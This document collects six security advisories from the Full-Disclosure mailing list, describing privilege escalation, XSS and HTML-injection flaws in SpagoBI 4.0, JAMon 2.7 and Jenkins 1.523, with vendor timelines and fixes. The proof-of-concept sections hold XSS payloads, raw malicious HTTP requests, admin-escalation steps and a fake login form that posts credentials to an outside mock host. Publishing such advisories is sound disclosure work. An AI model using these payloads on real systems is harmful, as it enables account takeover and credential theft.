[Full-disclosure] [CVE-2013-6231] Remote Privilege Escalation in SpagoBI v4.0
### 01. ### Advisory Information ### Title: Remote Privilege Escalation in SpagoBI Date published: 2013-02-28 Date of last update: 2013-02-28 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: High 02. ### Vulnerability Information ### CVE reference: CVE-2013-6231 CVSS v2 Base Score: 9 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that leads to unauthorized privileges being gained. The issue is triggered when the servlet (action): AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION is executed with specifically crafted input, and may allow a remote attacker to gain Administrator role privileges. 05. ### Technical Description / Proof of Concept Code ### An attacker (a SpagoBI malicious Business User with RSM role ) can invoke via URL the servlet (action): AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION to gain SpagoBI Administrator privilege. To reproduce the vulnerability follow the provided information and steps below: - Using a browser log on to SpagoBI with restricted account (e.g. Business User Account) - Execute: https://localhost/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION - Select your account from Users List - Select Administrator Role from Roles tab and save it Remote Privilege Escalation Attack has been successfully completed! 06. ### Business Impact ### Successful exploitation of the vulnerability may allow a remote, authenticated attacker to elevate privileges and obtain full access to the affected system. The attacker could exploit the vulnerability to become administrator and retrieve or publish any kind of data. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified February 28th, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6232] Persistent Cross-Site Scripting (XSS) in SpagoBI v4.0
###
01. ### Advisory Information ###
Title: Persistent Cross-Site Scripting (XSS) in SpagoBI
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: High
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6232
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation
03. ### Introduction ###
SpagoBI[1] is an Open Source Business Intelligence suite, belonging to
the free/open source SpagoWorld initiative, founded and supported by
Engineering Group[2].
It offers a large range of analytical functions, a highly functional
semantic layer often absent in other open source platforms and projects,
and a respectable set of advanced data visualization features including
geospatial analytics.
[3]SpagoBI is released under the Mozilla Public License, allowing its
commercial use.
SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an
independent open-source software community.
[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] -
http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi
04. ### Vulnerability Description ###
SpagoBI contains a flaw that allows persistent cross-site scripting
(XSS) attacks. This flaw exists because the application does not
validate certain unspecified input before returning it to the user. This
may allow an attacker to create a specially crafted request that would
execute arbitrary script code in a user's browser within the trust
relationship between their browser and the server.
05. ### Technical Description / Proof of Concept Code ###
In execution page can be visible a toolbar with various icons useful for
the user to perform actions related to the document runs.
The user can insert a note about the executed document.
The note is associated to the document with relative parameters value
and to the user.
It can be public or private, so public notes are visible to all users
while the private notes are visible only from the user creator.
An attacker (a SpagoBI malicious user with a restricted account ) can
insert a note with jasvascript code:
object data=javascript:alert('XSS')/object
and save it in public mode.
The code execution happens when the victim (an unaware user) click on
annotate document detail.
This is not the only way to add malicious code in the SpagoBI web app.
06. ### Business Impact ###
Exploitation of the vulnerability requires low privileged application
user account but low or medium user interaction.
Successful exploitation of the vulnerability results in session
hijacking, client-side phishing, client-side external redirects or
malware loads and client-side manipulation of the vulnerable module context.
07. ### Systems Affected ###
This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204
Fixed by vendor [verified]
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 08th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification to [SpagoBI Team]
November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team]
December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
January 16th, 2014: Fix/Patch Verified
March01st, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6233] Persistent HTML Script Insertion permits offsite-bound forms in SpagoBI v4.0
### 01. ### Advisory Information ### Title: Persistent HTML Script Insertion permits offsite-bound forms Date published: 2014-03-01 Date of last update: 2014-03-01 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: Medium 02. ### Vulnerability Information ### CVE reference: CVE-2013-6233 CVSS v2 Base Score: 4 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics. [3]SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that allows persistent script insertion. This may allow a remote attacker to inject HTML code including forms that load on a remote site, which can allow the attacker to conduct a phishing attack on a user and capture their credentials. 05. ### Technical Description / Proof of Concept Code ### The vulnerability is located in some SpagoBI input fields (e.g.'Description' input field from 'Short document metadata') To reproduce the vulnerability, the attacker (a malicious user) can add the malicious HTML script code: form method=POST action=http://www.mocksite.org/login/login.php.; Username: input type=text name=username size=15 /br / Password: input type=password name=passwort size=15 /br / div align=center pinput type=submit value=Login //p /div /form in 'Description' input field from 'Short document metadata' and click on save button. The code execution happens when the victim (an unaware user) click on 'Short document metadata'. This is not the only way to inject malicious HTML code in the SpagoBI web app. 06. ### Business Impact ### Exploitation of the vulnerability requires low privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in persistent phishing and persistent external redirects. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified March01st, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6234] XSS File Upload in SpagoBI v4.0
###
01. ### Advisory Information ###
Title: XSS File Upload
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: Medium
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6234
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation
03. ### Introduction ###
SpagoBI[1] is an Open Source Business Intelligence suite, belonging to
the free/open source SpagoWorld initiative, founded and supported by
Engineering Group[2].
It offers a large range of analytical functions, a highly functional
semantic layer often absent in other open source platforms and projects,
and a respectable set of advanced data visualization features including
geospatial analytics.
[3]SpagoBI is released under the Mozilla Public License, allowing its
commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2
Consortium, an independent open-source software community.
[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] -
http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi
04. ### Vulnerability Description ###
SpagoBI contains a flaw that may allow a remote attacker to execute
arbitrary code. This flaw exists because the application does not
restrict uploading for specific file types from Worksheet designer
function.
This may allow a remote attacker to upload arbitrary files (e.g. .html
for XSS) that would execute arbitrary script code in a user's browser
within the trust relationship between their browser and the server or
more easily conduct more serious attacks.
05. ### Technical Description / Proof of Concept Code ###
An attacker (a SpagoBI malicious user with a restricted account) can
upload a file from Worksheet designer function.
To reproduce the vulnerability follow the provided information and
steps below:
- Using a browser log on to SpagoBI with restricted account (e.g.
Business User Account)
- Go on: Worksheet designer function
- Click on: Image and Choose image
- Upload malicious file and save it
XSS Malicious File Upload Attack has been successfully completed!
More details about SpagoBI Worksheet Engine and Worksheet designer
http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview
(e.g. Malicious File: xss.html)
!DOCTYPE html
html
head
script
function myFunction()
{alert(XSS);}
/script
/head
body
input type=button onclick=myFunction() value=Show alert box
/body
/html
06. ### Business Impact ###
Exploitation of the vulnerability requires low privileged application
user account but low or medium user interaction. Successful exploitation
of the vulnerability results in session hijacking, client-side phishing,
client-side external redirects or malware loads and client-side
manipulation of the vulnerable module context.
07. ### Systems Affected ###
This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204
Fixed by vendor [verified]
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 09th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification to [SpagoBI Team]
November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team]
December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
January 16th, 2014: Fix/Patch Verified
March01st, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
###
01. ### Advisory Information ###
Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation
03. ### Introduction ###
The Java Application Monitor (JAMon) is a free, simple, high
performance, thread safe, Java API that allows developers to easily
monitor production applications.
http://jamonapi.sourceforge.net
04. ### Vulnerability Description ###
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been
identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site
scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before
returning it to users.
+--+---+
|-Vulnerable module(s)andparameter(s)--|
+--+---+
|mondetail.jsp ArraySQL|
|mondetail.jsp listenertype|
|mondetail.jsp currentlistener-|
|jamonadmin.jsp ---ArraySQL|
|sql.jsp---ArraySQL|
|exceptions.jspArraySQL|
+--+---+
05. ### Technical Description / Proof of Concept Code ###
05.01) Malicious Request (ArraySQL parameter):
The vulnerability is located in the ' Filter (optional) ' input field
upon submission to the pages
http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp
The application does not validate the 'ArraySQL' parameter upon
submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:
1--1ScRiPt alert('XSS')/ScRiPt!--
in the ' Filter (optional) ' input field and click on GO! button.
05.02) Malicious Request (listenertype parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--currentlistener=JAMonBufferListeneroutputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21
05.03) Malicious Request (currentlistener parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
listenertype=valuecurrentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--outputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21
06. ### Business Impact ###
This may allow an attacker to create a specially crafted request that
would execute arbitrary script code in a user's browser within the trust
relationship between their browser and the server.
07. ### Systems Affected ###
This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
Currently, there are no known upgrades or patches to correct this
vulnerability.
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure
[Full-disclosure] [CVE-2013-5573] Jenkins v1.523 Default markup formatter permits offsite-bound forms
### 01. ### Advisory Information ### Title: Default markup formatter permits offsite-bound forms Date published : 2013-12-16 Date of last update: 2013-12-16 Vendors contacted : Jenkins CI v 1.523 Discovered by: Christian Catalano Severity: Low 02. ### Vulnerability Information ### CVE reference: CVE-2013-5573 CVSS v2 Base Score: 4.7 CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N) Component/s : Jenkins CI v 1.523 Class : HTML Injection 03. ### Introduction ### Jenkins CI is an extendable open source continuous integration server http://jenkins-ci.org. 04. ### Vulnerability Description ### The default installation and configuration of Jenkins CI is prone to a security vulnerability. The Jenkins CI default markup formatter permits offsite-bound forms. This vulnerability could be exploited by a remote attacker (a malicious user) to inject malicious persistent HTML script code (application side). 05. ### Technical Description / Proof of Concept Code ### The vulnerability is located in the 'Descriotion' input field of the User Configuration function: https://localhost:9444/jenkins/user/attacker/configure To reproduce the vulnerability, the attacker (a malicious user) can add the malicious HTML script code: form method=POST action=http://www.mocksite.org/login/login.php.; Username: input type=text name=username size=15 /br / Password: input type=password name=passwort size=15 /br / div align=center pinput type=submit value=Login //p /div /form in the 'Descriotion' input field and click on save button. The code execution happens when the victim (an unaware user) view the 'People List' https://localhost:9444/jenkins/asynchPeople/ and click on attacker user id. 06. ### Business Impact ### Exploitation of the persistent web vulnerability requires a low privilege web application user account. Successful exploitation of the vulnerability results in persistent phishing and persistent external redirects. 07. ### Systems Affected ### This vulnerability was tested against: Jenkins CI v1.523 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily mitigate the flaw by implementing the following workaround: 'MyspacePolicy' permits tag(form, action, ONSITE_OR_OFFSITE_URL, method); Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or perhaps form could be banned entirely. 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### August 21th, 2013: Vulnerability identification August4th, 2013: Vendor notification [Jenkins CI] November 19th, 2013: Vulnerability confirmation [Jenkins CI] November 19th, 2013: Vendor Solution December 16th, 2013: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
